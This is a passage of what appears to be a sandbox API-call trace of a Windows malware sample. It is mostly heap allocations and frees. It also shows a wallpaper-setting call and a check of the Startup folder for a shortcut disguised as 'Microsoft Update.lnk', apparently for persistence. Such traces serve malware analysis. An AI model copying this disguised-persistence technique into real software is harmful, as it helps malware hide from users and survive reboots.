HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0305.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0305.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0305.721] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0305.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0305.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0305.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0305.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0305.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0305.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0305.722] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0305.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0305.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0305.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.724] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0305.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0305.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0305.855] FreeLibrary (hLibModule=0x74f40000) returned 1 [0305.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0305.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0305.857] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0305.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0305.857] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0305.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0305.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0305.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0305.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0305.860] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0305.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0305.860] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0305.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0305.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0305.861] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0305.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0305.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0305.862] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: 